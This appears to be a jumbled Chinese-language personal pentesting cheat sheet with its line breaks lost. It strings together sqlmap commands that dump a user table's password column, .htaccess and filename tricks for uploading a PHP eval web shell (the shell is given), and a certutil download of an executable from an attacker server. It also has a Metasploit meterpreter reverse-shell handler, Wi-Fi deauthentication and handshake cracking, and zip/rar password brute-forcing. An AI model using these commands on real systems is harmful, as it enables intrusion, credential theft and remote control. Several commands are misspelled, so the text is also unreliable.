--tables -D gaofei -T sys_user --columns -C "Name,Pwd" --dump返回所有-a直连数据库-d "mysql://root:password@192.168.0.1:3306/testdb" -f -banner --dbs --user指定url探测-u "http://" --banner从文件中读取探测-l 从burp日志中读取http要求日志文件在设置->logging->代理勾选要求python sqlmap.py -l testApifox1.curp右键copyas curl2.导入curl哇哇工具.htaccess<FilesMatch "shell">SetHandler application/x-httpd-php</FilesMatch>或AddType application/x-httpd-php .jpg .txt<?php @eval($_POST["yuer"]); echo "I am a horse."; ?>php大小写绕过,可以上传Php考试测验php文件加. .filename="1gggg.php::$DATA"filename="1gggg.php.ppphphp"https://github.com/smxiazi/xp_CAPTCHAhttps://github.com/smxiazi/New_xp_CAPTCHAhttp://burp 下载证书cacer.der 电脑利用,如果在仿照器须要改后缀 cacer.cer手机监听https://www.bilibili.com/video/BV1sv4y1Q77h/?spm_id_from=333.337.search-card.all.click&vd_source=8caa12b6d4fb69220f707ec62983a250HFS 文件做事器kali 搜索msdnsudo sumsfconsolethemida 加壳软件www.linuxcool.comkali 账号密码kaili 123456kaliapt 命令mousepad /etc/apt/sources.listapt updateapt search systemctl start sshapt install docker.iosystemstl start dockerdocker镜像hub.docker.com 阿里云搜索: 容器镜像做事 修正镜像地址,按照阿里云的文档操作docker run -dit --name=dvwa -p 10000:80 xxx/dvwa-dit为后台运行进入运用的命令docker exec -it dvwa bash-it 确定哪个运用apt install docker-compose 靶标凑集https://gitclone.comvulhubdocker-compose up -d xxx -d是放在后台 搭建环境,如springdocker ps -adocker-compose down 关闭docker rm -f dvwalinux 运行文件 elf苹果 macho远控木马python3 -m http.server 10000证书工具 也可以下载certutil -urlcache -split -f http://xxxx:10000/test.exemsfconsoleuse exploit.multi/handlerset paload windows/x64/meterpreter/revers_tcpset lhost 192...set lport 9999run百度 高等搜索漏洞盒子fuzz 暴力考试测验无线密码网卡监听1.airmon-ng start wlan0扫描2.airodump-ng wlan0抓取握手包3.airodump-ng -w ryan -c 6 --bssid mac wlan0-c:信道-w:存放位置--bssid:指定mac4.aireplay-ng -0 2 -a 路由器的mac -c 客户真个mac wlan05.破解握手包aircrack-ng -w pass.txt ran-.capwinhex 查看16进制工具C:\xampp\htdocs\testC:\xampp\htdocs\pikachu-master\vul\unsafeupload\uploadsfcrackzip -D -p passwords.txt password2.zipfcrackzip -b -c 'aA1!' -l 1-10 -u password2.zip 选择大小写且数字!-b代表brute-force;-l限定密码长度;-c指定利用的字符集:fcrackzip -b -c '1' -l 6 -u password2.zip 数字破解fcrackzip -D -p passwords.txt -u password2.zipfcrackzip -D -p /usr/share/wordlists/rockyou.txt -u password2.zipfcrackzip -D -p /usr/share/wordlists/rockyou.txt -u example.ziprarcrack example.rar --threads 2 --type rar
